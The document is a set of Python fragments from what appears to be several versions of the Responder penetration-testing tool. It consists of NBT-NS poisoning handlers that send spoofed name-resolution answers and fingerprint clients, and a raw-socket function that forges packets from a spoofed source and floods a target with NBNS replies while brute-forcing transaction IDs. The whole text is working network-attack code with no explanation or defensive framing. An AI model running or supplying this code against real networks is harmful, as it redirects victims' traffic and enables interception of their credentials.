def handle(self):
data, socket = self.request
Name = Decode_Name(data[13:45])
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == "\x01\x10":
Finger = None
if settings.Config.Finger_On_Off:
Finger = fingerprint.RunSmbFinger((self.client_address[0],445))
if settings.Config.AnalyzeMode: # Analyze Mode
LineHeader = "[Analyze mode: NBT-NS]"
print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
else: # Poisoning Mode
Buffer = NBT_Ans()
Buffer.calculate(data)
socket.sendto(str(Buffer), self.client_address)
LineHeader = "[*] [NBT-NS]"
print color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(data[43:46])), 2, 1)
if Finger is not None:
print text("[FINGER] OS Version : %s" % color(Finger[0], 3))
print text("[FINGER] Client Version : %s" % color(Finger[1], 3))
def handle(self):
data, socket = self.request
Name = Decode_Name(data[13:45])
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == "\x01\x10":
Finger = None
if settings.Config.Finger_On_Off:
Finger = fingerprint.RunSmbFinger(
(self.client_address[0], 445))
if settings.Config.AnalyzeMode: # Analyze Mode
LineHeader = "[Analyze mode: NBT-NS]"
print color(
"%s Request by %s for %s, ignoring" %
(LineHeader, self.client_address[0], Name), 2, 1)
SavePoisonersToDb({
'Poisoner': 'NBT-NS',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '1',
})
else: # Poisoning Mode
Buffer = NBT_Ans()
Buffer.calculate(data)
socket.sendto(str(Buffer), self.client_address)
LineHeader = "[*] [NBT-NS]"
print color(
"%s Poisoned answer sent to %s for name %s (service: %s)" %
(LineHeader, self.client_address[0], Name,
NBT_NS_Role(data[43:46])), 2, 1)
SavePoisonersToDb({
'Poisoner': 'NBT-NS',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '0',
})
if Finger is not None:
print text("[FINGER] OS Version : %s" %
color(Finger[0], 3))
print text("[FINGER] Client Version : %s" %
color(Finger[1], 3))
def startSpoofing(self):
try:
targetIp,srcIp,spoofName=settings.Config.spoof.split(":")
if targetIp == None or spoofName == None:
return
except:
print "ERROR"+settings.Config.spoof
return
spoofName = spoofName.upper()
encoded_name = ''.join([chr((ord(c)>>4) + ord('A'))
+ chr((ord(c)&0xF) + ord('A')) for c in spoofName])
padding = "CA"*(15-len(spoofName))+'AA'+'\x00'
count = 1000
Buffer = NBT_Ans()
Buffer.fields["NbtName"] = '\x20'+encoded_name+padding
Buffer.fields["IP"] = socket.inet_aton(settings.Config.Bind_To)
Buffer.fields["TTL"] = "\x00\x00\xFF\xFF"
Buffer.fields["Tid"] = "\xAA\xAA"
outs = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
packet = IP(src=srcIp,dst=targetIp,)/UDP(sport=137,dport=137)
pckt = bytearray(str(packet/Raw(load=str(Buffer))))
#Zero out the UPD checksum
pckt[26]='\x00'
pckt[27]='\x00'
while(True):
for i in range(0,255):
for j in range(0,255):
#Bruteforce the TXID
pckt[28]=chr(i)
pckt[29]=chr(j)
outs.sendto(pckt,(targetIp,137))
count = count+1
if(count>10000):
count = 0
LineHeader = "[*] [NBTSpam]"
print color (LineHeader,2,1)+" 10000 NBNS replies sent to "+targetIp+" for name "+spoofName
def handle(self):
data, socket = self.request
Name = Decode_Name(NetworkRecvBufferPython2or3(data[13:45]))
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == b'\x01\x10':
if settings.Config.AnalyzeMode: # Analyze Mode
LineHeader = "[Analyze mode: NBT-NS]"
print(
color(
"%s Request by %s for %s, ignoring" %
(LineHeader, self.client_address[0], Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'NBT-NS',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '1',
})
else: # Poisoning Mode
Buffer1 = NBT_Ans()
Buffer1.calculate(data)
socket.sendto(NetworkSendBufferPython2or3(Buffer1),
self.client_address)
LineHeader = "[*] [NBT-NS]"
print(
color(
"%s Poisoned answer sent to %s for name %s (service: %s)"
% (LineHeader, self.client_address[0], Name,
NBT_NS_Role(NetworkRecvBufferPython2or3(
data[43:46]))), 2, 1))
SavePoisonersToDb({
'Poisoner': 'NBT-NS',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '0',
})
def startSpoofing(self):
try:
targetIp, srcIp, spoofName = settings.Config.spoof.split(":")
if targetIp == None or spoofName == None:
return
except:
print "ERROR" + settings.Config.spoof
return
spoofName = spoofName.upper()
encoded_name = ''.join([
chr((ord(c) >> 4) + ord('A')) + chr((ord(c) & 0xF) + ord('A'))
for c in spoofName
])
padding = "CA" * (15 - len(spoofName)) + 'AA' + '\x00'
count = 1000
Buffer = NBT_Ans()
Buffer.fields["NbtName"] = '\x20' + encoded_name + padding
Buffer.fields["IP"] = socket.inet_aton(settings.Config.Bind_To)
Buffer.fields["TTL"] = "\x00\x00\xFF\xFF"
Buffer.fields["Tid"] = "\xAA\xAA"
outs = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
packet = IP(
src=srcIp,
dst=targetIp,
) / UDP(sport=137, dport=137)
pckt = bytearray(str(packet / Raw(load=str(Buffer))))
#Zero out the UPD checksum
pckt[26] = '\x00'
pckt[27] = '\x00'
while (True):
for i in range(0, 255):
for j in range(0, 255):
#Bruteforce the TXID
pckt[28] = chr(i)
pckt[29] = chr(j)
outs.sendto(pckt, (targetIp, 137))
count = count + 1
if (count > 10000):
count = 0
LineHeader = "[*] [NBTSpam]"
print color(
LineHeader, 2, 1
) + " 10000 NBNS replies sent to " + targetIp + " for name " + spoofName
